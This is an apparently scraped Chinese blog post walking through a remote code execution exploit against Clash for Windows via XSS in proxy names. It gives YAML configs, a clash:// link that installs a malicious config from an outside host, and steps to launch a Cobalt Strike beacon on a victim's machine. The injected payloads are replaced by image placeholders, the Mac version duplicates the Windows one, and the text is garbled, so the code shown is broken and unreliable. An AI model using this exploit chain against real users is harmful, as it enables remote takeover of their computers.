crash_for_windows_pkg远程代码执行漏洞
漏洞详情
crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。
文章图片
受影响的冲突版本_for_windows_pkg
版本:< 0.19.9
平台:windows,mac
操作系统细节:Windows 10
验证
1.新建一个yaml配置文件,内容具体如下:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a
文章图片
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: trueproxy-groups:
-
name:
文章图片
type: select
proxies:
- a
文章图片
2.打开clash,在Pprofiles中导入刚刚创建的配置文件
【crash_for_windows_pkg远程代码执行漏洞】
3.在proxies中点击图片链接即可触发。
文章图片
mac脚本 在mac中只是部分代码不同
代码如下:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:- name: a
文章图片
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: trueproxy-groups:
-
name:
文章图片
type: select
proxies:- a
文章图片
另一种利用方式 将恶意配置文件放到互联网上并用于
clash://
安装它,clash_for_windows_pkg 将自动下载并切换到它。如:
clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
上线CS 在CS上生成监听,主要设置端口时不要与上面代码中的端口出现重复,否则会报错。
文章图片
接着生成可执行文件
文章图片
将生成的beacon.exe文件放置在目标机C盘中,接着修改配置文件中的路径:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a
文章图片
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: trueproxy-groups:
-
name:
文章图片
type: select
proxies:
- a
文章图片
接着加载配置文件,最后点击proxies中点击图片链接。返回CS,可以看见已经成功上线CS。
推荐阅读
- 【ASP.NET|【ASP.NET Core】MVC模型绑定——实现同一个API方法兼容JSON和Form-data输入
- 内网渗透|一文理解 Windows 身份验证原理
- 常见提权汇总|权限提升-windows提权补丁-溢出-AT-SC-PS提权
- Windows|Windows 如何打开 .md 文件
- 别再写一堆的 for 循环了!Java 8 中的 Stream 轻松遍历树形结构,是真的牛逼!
- 软件安装|MongoDB下载安装教程(Windows)
- 数据库|Oracle12cWindows安装、介绍及简单使用(图文)
- 海量数据分析更快、更稳、更准。GaussDB(for|海量数据分析更快、更稳、更准。GaussDB(for MySQL) HTAP只读分析特性详解
- 海量数据分析更快、更稳、更准。GaussDB(for MySQL) HTAP只读分析特性详解
- 【混合编程】C/C++调用Fortran的DLL